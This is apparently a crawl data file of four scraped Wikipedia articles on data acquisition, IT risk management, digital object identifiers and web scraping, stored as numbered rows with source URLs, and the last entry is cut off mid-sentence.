580 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_acquisition | Data acquisition is the process of sampling signals that measure real-world physical conditions and converting the resulting samples into digital numeric values that can be manipulated by a computer. Data acquisition systems, abbreviated by the acronyms DAS, DAQ, or DAU, typically convert analog waveforms into digital values for processing. The components of data acquisition systems include: Data acquisition applications are usually controlled by software programs developed using various general purpose programming languages such as Assembly, BASIC, C, C , C , Fortran, Java, LabVIEW, Lisp, Pascal, etc. Stand-alone data acquisition systems are often called data loggers. There are also open-source software packages providing all the necessary tools to acquire data from different, typically specific, hardware equipment. These tools come from the scientific community where complex experiment requires fast, flexible, and adaptable software. Those packages are usually custom-fit but more general DAQ packages like the Maximum Integrated Data Acquisition System can be easily tailored and are used in several physics experiments. In 1963, IBM produced computers that specialized in data acquisition. These include the IBM 7700 Data Acquisition System, and its successor, the IBM 1800 Data Acquisition and Control System. These expensive specialized systems were surpassed in 1974 by general-purpose S 100 computers and data acquisition cards produced by Tecmar Scientific Solutions Inc. In 1981 IBM introduced the IBM Personal Computer and Scientific Solutions introduced the first PC data acquisition products. 1 2 3 4 5 Data acquisition begins with the physical phenomenon or physical property to be measured. Examples of this include temperature, vibration, light intensity, gas pressure, fluid flow, and force. Regardless of the type of physical property to be measured, the physical state that is to be measured must first be transformed into a unified form that can be sampled by a data acquisition system. The task of performing such transformations falls on devices called sensors. A data acquisition system is a collection of software and hardware that allows one to measure or control the physical characteristics of something in the real world. A complete data acquisition system consists of DAQ hardware, sensors and actuators, signal conditioning hardware, and a computer running DAQ software. If timing is necessary (such as for event mode DAQ systems), a separate compensated distributed timing system is required. A sensor, which is a type of transducer, is a device that converts a physical property into a corresponding electrical signal (e.g., strain gauge, thermistor). An acquisition system to measure different properties depends on the sensors that are suited to detect those properties. Signal conditioning may be necessary if the signal from the transducer is not suitable for the DAQ hardware being used. The signal may need to be filtered, shaped, or amplified in most cases. Various other examples of signal conditioning might be bridge completion, providing current or voltage excitation to the sensor, isolation, and linearization. For transmission purposes, single ended analog signals, which are more susceptible to noise can be converted to differential signals. Once digitized, the signal can be encoded to reduce and correct transmission errors. DAQ hardware is what usually interfaces between the signal and a PC. It could be in the form of modules that can be connected to the computer's ports (parallel, serial, USB, etc.) or cards connected to slots (S 100 bus, AppleBus, ISA, MCA, PCI, PCI-E, etc.) in a PC motherboard or in a modular crate (CAMAC, NIM, VME). Sometimes adapters are needed, in which case an external breakout box can be used. DAQ cards often contain multiple components (multiplexer, ADC, DAC, TTL-IO, high-speed timers, RAM). These are accessible via a bus by a microcontroller, which can run small programs. A controller is more flexible than a hard-wired logic, yet cheaper than a CPU so it is permissible to block it with simple polling loops. For example: Waiting for a trigger, starting the ADC, looking up the time, waiting for the ADC to finish, move value to RAM, switch multiplexer, get TTL input, let DAC proceed with voltage ramp. Today, signals from some sensors and Data Acquisition Systems can be streamed via Bluetooth. DAQ device drivers are needed for the DAQ hardware to work with a PC. The device driver performs low-level register writes and reads on the hardware while exposing API for developing user applications in a variety of programs. Specialized DAQ software may be delivered with the DAQ hardware. Software tools used for building large-scale data acquisition systems include EPICS. Other programming environments that are used to build DAQ applications include ladder logic, Visual C , Visual Basic, LabVIEW, and MATLAB. |
581 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Information_risk_management | IT risk management is the application of risk management methods to information technology in order to manage IT risk, i.e.: An IT risk management system (ITRMS) can be considered a subcomponent of a wider enterprise risk management system. 1 ITRMS also tend to be integrated into a broader information security management system (ISMS). The establishment, maintenance and continuous update of an ISMS provide a strong indication that a company is using a systematic approach for the identification, assessment and management of information security risks. 2 Different methodologies have been proposed to manage IT risks, each of them divided into processes and steps. 3 According to the Risk IT framework, 1 this encompasses not only the negative impact of operations and service delivery which can bring destruction or reduction of the value of the organization, but also the benefit enabling risk associated to missing opportunities to use technology to enable or enhance business or the IT project management for aspects like overspending or late delivery with adverse business impact. clarification needed incomprehensible sentence Because risk is strictly tied to uncertainty, decision theory should be applied to manage risk as a science, i.e. rationally making choices under uncertainty. Generally speaking, risk is the product of likelihood times impact (Risk Likelihood Impact). 4 The measure of an IT risk can determined as a product of threat, vulnerability and asset values: 5 A more current risk management framework for IT Risk would be the TIK framework: The process of risk management is an ongoing iterative process. It must be repeated indefinitely. The business environment is constantly changing and new threats and vulnerabilities emerge every day. The choice of countermeasures (controls) used to manage risks must strike a balance between productivity, cost, effectiveness of the countermeasure, and the value of the informational asset being protected. The Certified Information Systems Auditor Review Manual 2006 produced by ISACA, an international professional association focused on IT Governance, provides the following definition of risk management: "Risk management is the process of identifying vulnerabilities and threats to the information resources used by an organization in achieving business objectives, and deciding what countermeasures, if any, to take in reducing risk to an acceptable level, based on the value of the information resource to the organization. 6 Risk management is the process that allows IT managers to balance the operational and economic costs of protective measures and achieve gains in mission capability by protecting the IT systems and data that support their organizations’ missions. This process is not unique to the IT environment; indeed it pervades decision-making in all areas of our daily lives. 7 The head of an organizational unit must ensure that the organization has the capabilities needed to accomplish its mission. These mission owners must determine the security capabilities that their IT systems must have to provide the desired level of mission support in the face of real world threats. Most organizations have tight budgets for IT security; therefore, IT security spending must be reviewed as thoroughly as other management decisions. A well-structured risk management methodology, when used effectively, can help management identify appropriate controls for providing the mission-essential security capabilities. 7 Risk management in the IT world is quite a complex, multi faced activity, with a lot of relations with other complex activities. The picture to the right shows the relationships between different related terms. The American National Information Assurance Training and Education Center defines risk management in the IT field as: 8 Some organizations have and many others should have a comprehensive Enterprise risk management (ERM) in place. The four objective categories addressed, according to Committee of Sponsoring Organizations of the Treadway Commission (COSO) are: According to the Risk IT framework by ISACA, 9 IT risk is transversal to all four categories. The IT risk should be managed in the framework of Enterprise risk management: Risk appetite and Risk sensitivity of the whole enterprise should guide the IT risk management process. ERM should provide the context and business objectives to IT risk management Whilst a methodology does not describe specific methods; nevertheless it does specify several processes (constitute a generic framework) that need to be followed. These processes may be broken down in sub-processes, they may be combined, or their sequence may change. A risk management exercise must carry out these processes in one form or another, The following table compares the processes foreseen by three leading standards. 3 The ISACA Risk IT framework is more recent. The Risk IT Practitioner-Guide 10 compares Risk IT and ISO 27005. The term methodology means an organized set of principles and rules that drive action in a particular field of knowledge. 3 The overall comparison is illustrated in the following table. RE2 process includes: In general, the elements as described in the ISO 27005 process are all included in Risk IT; however, some are structured and named differently. Due to the probabilistic nature and the need of cost benefit analysis, IT risks are managed following a process that according to NIST SP 800 30 can be divided in the following steps: 7 Effective risk management must be totally integrated into the Systems Development Life Cycle. 7 Information risk analysis conducted on applications, computer installations, networks and systems under development should be undertaken using structured methodologies. 11 This step is the first step in ISO ISO IEC 27005 framework. Most of the elementary activities are foreseen as the first sub process of Risk assessment according to NIST SP 800 30. This step implies the acquisition of all relevant information about the organization and the determination of the basic criteria, purpose, scope and boundaries of risk management activities and the organization in charge of risk management activities. The purpose is usually the compliance with legal requirements and provide evidence of due diligence supporting an ISMS that can be certified. The scope can be an incident reporting plan, a business continuity plan. Another area of application can be the certification of a product. Criteria include the risk evaluation, risk acceptance and impact evaluation criteria. These are conditioned by: 12 Establishing the scope and boundaries, the organization should be studied: its mission, its values, its structure; its strategy, its locations and cultural environment. The constraints (budgetary, cultural, political, technical) of the organization are to be collected and documented as guide for next steps. The set up of the organization in charge of risk management is foreseen as partially fulfilling the requirement to provide the resources needed to establish, implement, operate, monitor, review, maintain and improve an ISMS. 13 The main roles inside this organization are: 7 Risk Management is a recurrent activity that deals with the analysis, planning, implementation, control, and monitoring of implemented measurements and the enforced security policy. On the contrary, Risk Assessment is executed at discrete time points (e.g. once a year, on demand, etc.) and until the performance of the next assessment provides a temporary view of assessed risks and while parameterizing the entire Risk Management process. This view of the relationship of Risk Management to Risk Assessment is depicted in figure as adopted from OCTAVE. 2 Risk assessment is often conducted in more than one iteration, the first being a high-level assessment to identify high risks, while the other iterations detailed the analysis of the major risks and other risks. According to National Information Assurance Training and Education Center risk assessment in the IT field is: 8 Risk assessment receives as input the output of the previous step Context establishment; the output is the list of assessed risks prioritized according to risk evaluation criteria. The process can be divided into the following steps: 12 The following table compares these ISO 27005 processes with Risk IT framework processes: 10 The ISO IEC 27002:2005 Code of practice for information security management recommends the following be examined during a risk assessment: Risk identification states what could cause a potential loss; the following are to be identified: 12 The output of sub process is made up of: There are two methods of risk assessment in information security field, quantitative and qualitative. 14 Purely quantitative risk assessment is a mathematical calculation based on security metrics on the asset (system or application). For each risk scenario, taking into consideration the different risk factors a Single loss expectancy (SLE) is determined. Then, considering the probability of occurrence on a given period basis, for example the annual rate of occurrence (ARO), the Annualized Loss Expectancy is determined as the product of ARO and SLE. 5 It is important to point out that the values of assets to be considered are those of all involved assets, not only the value of the directly affected resource. For example, if you consider the risk scenario of a Laptop theft threat, you should consider the value of the data (a related asset) contained in the computer and the reputation and liability of the company (other assets) deriving from the loss of availability and confidentiality of the data that could be involved. It is easy to understand that intangible assets (data, reputation, liability) can be worth much more than physical resources at risk (the laptop hardware in the example). 15 Intangible asset value can be huge, but is not easy to evaluate: this can be a consideration against a pure quantitative approach. 16 Qualitative risk assessment (three to five steps evaluation, from Very High to Low) is performed when the organization requires a risk assessment be performed in a relatively short time or to meet a small budget, a significant quantity of relevant data is not available, or the persons performing the assessment don't have the sophisticated mathematical, financial, and risk assessment expertise required. 14 Qualitative risk assessment can be performed in a shorter period of time and with less data. Qualitative risk assessments are typically performed through interviews of a sample of personnel from all relevant groups within an organization charged with the security of the asset being assessed. Qualitative risk assessments are descriptive versus measurable. Usually a qualitative classification is done followed by a quantitative evaluation of the highest risks to be compared to the costs of security measures. Risk estimation has as input the output of risk analysis and can be split in the following steps: The output is the list of risks with value levels assigned. It can be documented in a risk register. Risks arising from security threats and adversary attacks may be particularly difficult to estimate. This difficulty is made worse because, at least for any IT system connected to the Internet, any adversary with intent and capability may attack because physical closeness or access is not necessary. Some initial models have been proposed for this problem. 17 During risk estimation there are generally three values of a given asset, one for the loss of one of the CIA properties: Confidentiality, Integrity, Availability. 18 The risk evaluation process receives as input the output of risk analysis process. It compares each risk level against the risk acceptance criteria and prioritise the risk list with risk treatment indications. To determine the likelihood of a future adverse event, threats to an IT system must be in conjunction with the potential vulnerabilities and the controls in place for the IT system. Impact refers to the magnitude of harm that could be caused by a threat's exercise of vulnerability. The level of impact is governed by the potential mission impacts and produces a relative value for the IT assets and resources affected (e.g., the criticality sensitivity of the IT system components and data). The risk assessment methodology encompasses nine primary steps: 7 Risk mitigation, the second process according to SP 800 30, the third according to ISO 27005 of risk management, involves prioritizing, evaluating, and implementing the appropriate risk-reducing controls recommended from the risk assessment process. Because the elimination of all risk is usually impractical or close to impossible, it is the responsibility of senior management and functional and business managers to use the least-cost approach and implement the most appropriate controls to decrease mission risk to an acceptable level, with minimal adverse impact on the organization's resources and mission. The risk treatment process aim at selecting security measures to: risk and produce a risk treatment plan, that is the output of the process with the residual risks subject to the acceptance of management. There are some list to select appropriate security measures, 13 but is up to the single organization to choose the most appropriate one according to its business strategy, constraints of the environment and circumstances. The choice should be rational and documented. The importance of accepting a risk that is too costly to reduce is very high and led to the fact that risk acceptance is considered a separate process. 12 Risk transfer apply were the risk has a very high impact but is not easy to reduce significantly the likelihood by means of security controls: the insurance premium should be compared against the mitigation costs, eventually evaluating some mixed strategy to partially treat the risk. Another option is to outsource the risk to somebody more efficient to manage the risk. 19 Risk avoidance describe any action where ways of conducting business are changed to avoid any risk occurrence. For example, the choice of not storing sensitive information about customers can be an avoidance for the risk that customer data can be stolen. The residual risks, i.e. the risk remaining after risk treatment decision have been taken, should be estimated to ensure that sufficient protection is achieved. If the residual risk is unacceptable, the risk treatment process should be iterated. Risk mitigation is a systematic methodology used by senior management to reduce mission risk. 7 Risk mitigation can be achieved through any of the following risk mitigation options: Address the greatest risks and strive for sufficient risk mitigation at the lowest cost, with minimal impact on other mission capabilities: this is the suggestion contained in 7 Risk communication is a horizontal process that interacts bidirectionally with all other processes of risk management. Its purpose is to establish a common understanding of all aspect of risk among all the organization's stakeholder. Establishing a common understanding is important, since it influences decisions to be taken. The Risk Reduction Overview method 20 is specifically designed for this process. It presents a comprehensible overview of the coherence of risks, measures and residual risks to achieve this common understanding. Risk management is an ongoing, never ending process. Within this process implemented security measures are regularly monitored and reviewed to ensure that they work as planned and that changes in the environment rendered them ineffective. Business requirements, vulnerabilities and threats can change over the time. Regular audits should be scheduled and should be conducted by an independent party, i.e. somebody not under the control of whom is responsible for the implementations or daily management of ISMS. Security controls should be validated. Technical controls are possible complex systems that are to tested and verified. The hardest part to validate is people knowledge of procedural controls and the effectiveness of the real application in daily business of the security procedures. 7 Vulnerability assessment, both internal and external, and Penetration test are instruments for verifying the status of security controls. Information technology security audit is an organizational and procedural control with the aim of evaluating security. The IT systems of most organization are evolving quite rapidly. Risk management should cope with these changes through change authorization after risk re evaluation of the affected systems and processes and periodically review the risks and mitigation actions. 5 Monitoring system events according to a security monitoring strategy, an incident response plan and security validation and metrics are fundamental activities to assure that an optimal level of security is obtained. It is important to monitor the new vulnerabilities, apply procedural and technical security controls like regularly updating software, and evaluate other kinds of controls to deal with zero-day attacks. The attitude of involved people to benchmark against best practice and follow the seminars of professional associations in the sector are factors to assure the state of art of an organization IT risk management practice. Effective risk management must be totally integrated into the SDLC. An IT system's SDLC has five phases: initiation, development or acquisition, implementation, operation or maintenance, and disposal. The risk management methodology is the same regardless of the SDLC phase for which the assessment is being conducted. Risk management is an iterative process that can be performed during each major phase of the SDLC. 7 NIST SP 800 64 21 is devoted to this topic. Early integration of security in the SDLC enables agencies to maximize return on investment in their security programs, through: 21 This guide 21 focuses on the information security components of the SDLC. First, descriptions of the key security roles and responsibilities that are needed in most information system developments are provided. Second, sufficient information about the SDLC is provided to allow a person who is unfamiliar with the SDLC process to understand the relationship between information security and the SDLC. The document integrates the security steps into the linear, sequential (a.k.a. waterfall) SDLC. The five-step SDLC cited in the document is an example of one method of development and is not intended to mandate this methodology. Lastly, SP 800 64 provides insight into IT projects and initiatives that are not as clearly defined as SDLC-based developments, such as service-oriented architectures, cross-organization projects, and IT facility developments. Security can be incorporated into information systems acquisition, development and maintenance by implementing effective security practices in the following areas. 22 Information systems security begins with incorporating security into the requirements process for any new application or system enhancement. Security should be designed into the system from the beginning. Security requirements are presented to the vendor during the requirements phase of a product purchase. Formal testing should be done to determine whether the product meets the required security specifications prior to purchasing the product. Correct processing in applications is essential in order to prevent errors and to mitigate loss, unauthorized modification or misuse of information. Effective coding techniques include validating input and output data, protecting message integrity using encryption, checking for processing errors, and creating activity logs. Applied properly, cryptographic controls provide effective mechanisms for protecting the confidentiality, authenticity and integrity of information. An institution should develop policies on the use of encryption, including proper key management. Disk Encryption is one way to protect data at rest. Data in transit can be protected from alteration and unauthorized viewing using SSL certificates issued through a Certificate Authority that has implemented a Public Key Infrastructure. System files used by applications must be protected in order to ensure the integrity and stability of the application. Using source code repositories with version control, extensive testing, production back-off plans, and appropriate access to program code are some effective measures that can be used to protect an application's files. Security in development and support processes is an essential part of a comprehensive quality assurance and production control process, and would usually involve training and continuous oversight by the most experienced staff. Applications need to be monitored and patched for technical vulnerabilities. Procedures for applying patches should include evaluating the patches to determine their appropriateness, and whether or not they can be successfully removed in case of a negative impact. Risk management as a scientific methodology has been criticized as being shallow. 3 Major IT risk management programmes for large organizations, such as mandated by the US Federal Information Security Management Act, have been criticized. By avoiding the complexity that accompanies the formal probabilistic model of risks and uncertainty, risk management looks more like a process that attempts to guess rather than formally predict the future on the basis of statistical evidence. It is highly subjective in assessing the value of assets, the likelihood of threats occurrence and the significance of the impact. However, a better way to deal with the subject has not emerged. 3 It is quite hard to list most of the methods that at least partially support the IT risk management process. Efforts in this direction were done by: Enisa report 2 classified the different methods regarding completeness, free availability, tool support; the result is that: The Factor Analysis of Information Risk (FAIR) main document, "An Introduction to Factor Analysis of Information Risk (FAIR) , Risk Management Insight LLC, November 2006; 16 outline that most of the methods above lack of rigorous definition of risk and its factors. FAIR is not another methodology to deal with risk management, but it complements existing methodologies. 27 FAIR has had a good acceptance, mainly by The Open Group and ISACA. ISACA developed a methodology, called Risk IT, to address various kind of IT related risks, chiefly security related risks. It is integrated with COBIT, a general framework to manage IT. Risk IT has a broader concept of IT risk than other methodologies, it encompasses not just only the negative impact of operations and service delivery which can bring destruction or reduction of the value of the organization, but also the benefit value enabling risk associated to missing opportunities to use technology to enable or enhance business or the IT project management for aspects like overspending or late delivery with adverse business impact. 1 The "Build Security In" initiative of Homeland Security Department of United States, cites FAIR. 28 The initiative Build Security In is a collaborative effort that provides practices, tools, guidelines, rules, principles, and other resources that software developers, architects, and security practitioners can use to build security into software in every phase of its development. So it chiefly address Secure coding. In 2016, Threat Sketch launched an abbreviated cyber security risk assessment specifically for small organizations. 29 30 The methodology uses real options to forecast and prioritize a fixed list of high-level threats. The DoCRA Council developed The Duty of Care Risk Analysis (DoCRA) standard which provides principles and methods to analyze risk, based on an organization's mission, objectives, and obligations. DoCRA addresses the likelihood and impact of those risks on all parties, and whether safeguards appropriately protect others from harm while presenting a reasonable burden the business. The DoCRA methodology has been used by a number of state attorneys in data breach litigation 31 to determine settlements. In the US, data and privacy legislation continue to evolve to focus on 'reasonable security' for sensitive information risk management. The goal is to ensure organizations establish their duty of care when it comes to managing data. Businesses are responsible to understand their risk posture to prevent foreseeable harm reasonable safeguards based on their specific working environment. There are a number of standards about IT risk and IT risk management. For a description see the main article. |
582 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Doi_(identifier) | A digital object identifier (DOI) is a persistent identifier or handle used to uniquely identify various objects, standardized by the International Organization for Standardization (ISO). 1 DOIs are an implementation of the Handle System; 2 3 they also fit within the URI system (Uniform Resource Identifier). They are widely used to identify academic, professional, and government information, such as journal articles, research reports, data sets, and official publications. A DOI aims to resolve to its target, the information object to which the DOI refers. This is achieved by binding the DOI to metadata about the object, such as a URL where the object is located. Thus, by being actionable and interoperable, a DOI differs from ISBNs or ISRCs which are identifiers only. The DOI system uses the indecs Content Model for representing metadata. The DOI for a document remains fixed over the lifetime of the document, whereas its location and other metadata may change. Referring to an online document by its DOI should provide a more stable link than directly using its URL. But if its URL changes, the publisher must update the metadata for the DOI to maintain the link to the URL. 4 5 6 It is the publisher's responsibility to update the DOI database. If they fail to do so, the DOI resolves to a dead link, leaving the DOI useless. 7 The developer and administrator of the DOI system is the International DOI Foundation (IDF), which introduced it in 2000. 8 Organizations that meet the contractual obligations of the DOI system and are willing to pay to become a member of the system can assign DOIs. 9 The DOI system is implemented through a federation of registration agencies coordinated by the IDF. 10 By late April 2011 more than 50 million DOI names had been assigned by some 4,000 organizations, 11 and by April 2013 this number had grown to 85 million DOI names assigned through 9,500 organizations citation needed . A DOI is a type of Handle System handle, which takes the form of a character string divided into two parts, a prefix and a suffix, separated by a slash. The prefix identifies the registrant of the identifier and the suffix is chosen by the registrant and identifies the specific object associated with that DOI. Most legal Unicode characters are allowed in these strings, which are interpreted in a case-insensitive manner. The prefix usually takes the form 10.NNNN, where NNNN is a number greater than or equal to 1000, whose limit depends only on the total number of registrants. 12 13 The prefix may be further subdivided with periods, like 10.NNNN.N. 14 For example, in the DOI name 10.1000 182, the prefix is 10.1000 and the suffix is 182. The "10" part of the prefix distinguishes the handle as part of the DOI namespace, as opposed to some other Handle System namespace, A and the characters 1000 in the prefix identify the registrant; in this case the registrant is the International DOI Foundation itself. 182 is the suffix, or item ID, identifying a single object (in this case, the latest version of the DOI Handbook). DOI names can identify creative works (such as texts, images, audio or video items, and software) in both electronic and physical forms, performances, and abstract works 15 such as licenses, parties to a transaction, etc. The names can refer to objects at varying levels of detail: thus DOI names can identify a journal, an individual issue of a journal, an individual article in the journal, or a single table in that article. The choice of level of detail is left to the assigner, but in the DOI system it must be declared as part of the metadata that is associated with a DOI name, using a data dictionary based on the indecs Content Model. The official DOI Handbook explicitly states that DOIs should be displayed on screens and in print in the format doi:10.1000 182. 16 Contrary to the DOI Handbook, CrossRef, a major DOI registration agency, recommends displaying a URL (for example, https: doi.org 10.1000 182) instead of the officially specified format (for example, doi:10.1000 182) 17 18 This URL is persistent (there is a contract that ensures persistence in the DOI.ORG domain), so it is a PURL—providing the location of an HTTP proxy server which will redirect web accesses to the correct online location of the linked item. 9 19 The CrossRef recommendation is primarily based on the assumption that the DOI is being displayed without being hyperlinked to its appropriate URL—the argument being that without the hyperlink it is not as easy to copy-and-paste the full URL to actually bring up the page for the DOI, thus the entire URL should be displayed, allowing people viewing the page containing the DOI to copy-and-paste the URL, by hand, into a new window tab in their browser in order to go to the appropriate page for the document the DOI represents. 20 Since DOI is a namespace within the Handle System, it is semantically correct to represent it as the URI info:doi 10.1000 182. Major content of the DOI system currently includes: In the Organisation for Economic Co-operation and Development's publication service OECD iLibrary, each table or graph in an OECD publication is shown with a DOI name that leads to an Excel file of data underlying the tables and graphs. Further development of such services is planned. 22 Other registries include Crossref and the multilingual European DOI Registration Agency (mEDRA). 23 Since 2015, RFCs can be referenced as doi:10.17487 rfc.... 24 The IDF designed the DOI system to provide a form of persistent identification, in which each DOI name permanently and unambiguously identifies the object to which it is associated (although when the publisher of a journal changes, sometimes all the DOIs will be changed, with the old DOIs no longer working). It also associates metadata with objects, allowing it to provide users with relevant pieces of information about the objects and their relationships. Included as part of this metadata are network actions that allow DOI names to be resolved to web locations where the objects they describe can be found. To achieve its goals, the DOI system combines the Handle System and the indecs Content Model with a social infrastructure. The Handle System ensures that the DOI name for an object is not based on any changeable attributes of the object such as its physical location or ownership, that the attributes of the object are encoded in its metadata rather than in its DOI name, and that no two objects are assigned the same DOI name. Because DOI names are short character strings, they are human-readable, may be copied and pasted as text, and fit into the URI specification. The DOI name-resolution mechanism acts behind the scenes, so that users communicate with it in the same way as with any other web service; it is built on open architectures, incorporates trust mechanisms, and is engineered to operate reliably and flexibly so that it can be adapted to changing demands and new applications of the DOI system. 25 DOI name-resolution may be used with OpenURL to select the most appropriate among multiple locations for a given object, according to the location of the user making the request. 26 However, despite this ability, the DOI system has drawn criticism from librarians for directing users to non-free copies of documents, that would have been available for no additional fee from alternative locations. 27 The indecs Content Model as used within the DOI system associates metadata with objects. A small kernel of common metadata is shared by all DOI names and can be optionally extended with other relevant data, which may be public or restricted. Registrants may update the metadata for their DOI names at any time, such as when publication information changes or when an object moves to a different URL. The International DOI Foundation (IDF) oversees the integration of these technologies and operation of the system through a technical and social infrastructure. The social infrastructure of a federation of independent registration agencies offering DOI services was modelled on existing successful federated deployments of identifiers such as GS1 and ISBN. A DOI name differs from commonly used Internet pointers to material, such as the Uniform Resource Locator (URL), in that it identifies an object itself as a first-class entity, rather than the specific place where the object is located at a certain time. It implements the Uniform Resource Identifier (Uniform Resource Name) concept and adds to it a data model and social infrastructure. 28 A DOI name also differs from standard identifier registries such as the ISBN, ISRC, etc. The purpose of an identifier registry is to manage a given collection of identifiers, whereas the primary purpose of the DOI system is to make a collection of identifiers actionable and interoperable, where that collection can include identifiers from many other controlled collections. 29 The DOI system offers persistent, semantically interoperable resolution to related current data and is best suited to material that will be used in services outside the direct control of the issuing assigner (e.g., public citation or managing content of value). It uses a managed registry (providing both social and technical infrastructure). It does not assume any specific business model for the provision of identifiers or services and enables other existing services to link to it in defined ways. Several approaches for making identifiers persistent have been proposed. The comparison of persistent identifier approaches is difficult because they are not all doing the same thing. Imprecisely referring to a set of schemes as "identifiers" does not mean that they can be compared easily. Other "identifier systems" may be enabling technologies with low barriers to entry, providing an easy to use labeling mechanism that allows anyone to set up a new instance (examples include Persistent Uniform Resource Locator (PURL), URLs, Globally Unique Identifiers (GUIDs), etc.), but may lack some of the functionality of a registry-controlled scheme and will usually lack accompanying metadata in a controlled scheme. The DOI system does not have this approach and should not be compared directly to such identifier schemes. Various applications using such enabling technologies with added features have been devised that meet some of the features offered by the DOI system for specific sectors (e.g., ARK). A DOI name does not depend on the object's location and, in this way, is similar to a Uniform Resource Name (URN) or PURL but differs from an ordinary URL. URLs are often used as substitute identifiers for documents on the Internet although the same document at two different locations has two URLs. By contrast, persistent identifiers such as DOI names identify objects as first class entities: two instances of the same object would have the same DOI name. DOI name resolution is provided through the Handle System, developed by Corporation for National Research Initiatives, and is freely available to any user encountering a DOI name. Resolution redirects the user from a DOI name to one or more pieces of typed data: URLs representing instances of the object, services such as e-mail, or one or more items of metadata. To the Handle System, a DOI name is a handle, and so has a set of values assigned to it and may be thought of as a record that consists of a group of fields. Each handle value must have a data type specified in its type field, which defines the syntax and semantics of its data. While a DOI persistently and uniquely identifies the object to which it is assigned, DOI resolution may not be persistent, due to technical and administrative issues. To resolve a DOI name, it may be input to a DOI resolver, such as doi.org. Another approach, which avoids typing or cutting-and-pasting into a resolver is to include the DOI in a document as a URL which uses the resolver as an HTTP proxy, such as https: doi.org (preferred) 30 or http: dx.doi.org , both of which support HTTPS. For example, the DOI 10.1000 182 can be included in a reference or hyperlink as https: doi.org 10.1000 182. This approach allows users to click on the DOI as a normal hyperlink. Indeed, as previously mentioned, this is how CrossRef recommends that DOIs always be represented (preferring HTTPS over HTTP), so that if they are cut-and-pasted into other documents, emails, etc., they will be actionable. Other DOI resolvers and HTTP Proxies include the Handle System and PANGAEA. At the beginning of the year 2016, a new class of alternative DOI resolvers was started by http: doai.io. This service is unusual in that it tries to find a non-paywalled (often author archived) version of a title and redirects the user to that instead of the publisher's version. 31 32 Since then, other open-access favoring DOI resolvers have been created, notably https: oadoi.org in October 2016 33 (later Unpaywall). While traditional DOI resolvers solely rely on the Handle System, alternative DOI resolvers first consult open access resources such as BASE (Bielefeld Academic Search Engine). 31 33 An alternative to HTTP proxies is to use one of a number of add-ons and plug-ins for browsers, thereby avoiding the conversion of the DOIs to URLs, 34 which depend on domain names and may be subject to change, while still allowing the DOI to be treated as a normal hyperlink. A disadvantage of this approach for publishers is that, at least at present, most users will be encountering the DOIs in a browser, mail reader, or other software which does not have one of these plug-ins installed. The International DOI Foundation (IDF), a non-profit organisation created in 1997, is the governance body of the DOI system. 35 It safeguards all intellectual property rights relating to the DOI system, manages common operational features, and supports the development and promotion of the DOI system. The IDF ensures that any improvements made to the DOI system (including creation, maintenance, registration, resolution and policymaking of DOI names) are available to any DOI registrant. It also prevents third parties from imposing additional licensing requirements beyond those of the IDF on users of the DOI system. The IDF is controlled by a Board elected by the members of the Foundation, with an appointed Managing Agent who is responsible for co-ordinating and planning its activities. Membership is open to all organizations with an interest in electronic publishing and related enabling technologies. The IDF holds annual open meetings on the topics of DOI and related issues. Registration agencies, appointed by the IDF, provide services to DOI registrants: they allocate DOI prefixes, register DOI names, and provide the necessary infrastructure to allow registrants to declare and maintain metadata and state data. Registration agencies are also expected to actively promote the widespread adoption of the DOI system, to cooperate with the IDF in the development of the DOI system as a whole, and to provide services on behalf of their specific user community. A list of current RAs is maintained by the International DOI Foundation. The IDF is recognized as one of the federated registrars for the Handle System by the DONA Foundation (of which the IDF is a board member), and is responsible for assigning Handle System prefixes under the top-level 10 prefix. 36 Registration agencies generally charge a fee to assign a new DOI name; parts of these fees are used to support the IDF. The DOI system overall, through the IDF, operates on a not-for-profit cost recovery basis. The DOI system is an international standard developed by the International Organization for Standardization in its technical committee on identification and description, TC46 SC9. 37 The Draft International Standard ISO DIS 26324, Information and documentation Digital Object Identifier System met the ISO requirements for approval. The relevant ISO Working Group later submitted an edited version to ISO for distribution as an FDIS (Final Draft International Standard) ballot, 38 which was approved by 100% of those voting in a ballot closing on 15 November 2010. 39 The final standard was published on 23 April 2012. 1 DOI is a registered URI under the info URI scheme specified by IETF RFC 4452. info:doi is the infoURI Namespace of Digital Object Identifiers. 40 The DOI syntax is a NISO standard, first standardized in 2000, ANSI NISO Z39.84 2005 Syntax for the Digital Object Identifier. 41 The maintainers of the DOI system have deliberately not registered a DOI namespace for URNs, stating that: URN architecture assumes a DNS-based Resolution Discovery Service (RDS) to find the service appropriate to the given URN scheme. However no such widely deployed RDS schemes currently exist.... DOI is not registered as a URN namespace, despite fulfilling all the functional requirements, since URN registration appears to offer no advantage to the DOI System. It requires an additional layer of administration for defining DOI as a URN namespace (the string urn:doi:10.1000 1 rather than the simpler doi:10.1000 1) and an additional step of unnecessary redirection to access the resolution service, already achieved through either http proxy or native resolution. If RDS mechanisms supporting URN specifications become widely available, DOI will be registered as a URN. |
583 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#DOM_parsing | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting 